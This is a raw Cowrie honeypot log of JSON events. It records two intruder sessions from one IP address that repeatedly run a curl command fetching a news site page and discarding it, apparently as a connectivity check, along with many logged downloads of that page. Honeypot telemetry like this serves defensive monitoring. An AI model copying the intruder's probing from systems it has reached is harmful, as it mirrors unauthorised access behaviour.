{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.993612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.997150Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.002446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.009564Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.013031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.016365Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.019039Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.023204Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.026647Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.031143Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.033506Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.040334Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.041564Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.046036Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.050278Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.053993Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.056894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.060206Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.065003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.067672Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.072078Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.076380Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.078953Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.083808Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.088976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.090482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.094739Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.098873Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.102847Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.109085Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.112448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.116023Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.118649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.122632Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.127296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.130982Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.132044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.137116Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.141478Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.144567Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.148139Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.150758Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.154815Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.157290Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.160205Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.162778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.166000Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.169293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.172750Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.177002Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.180861Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.186576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
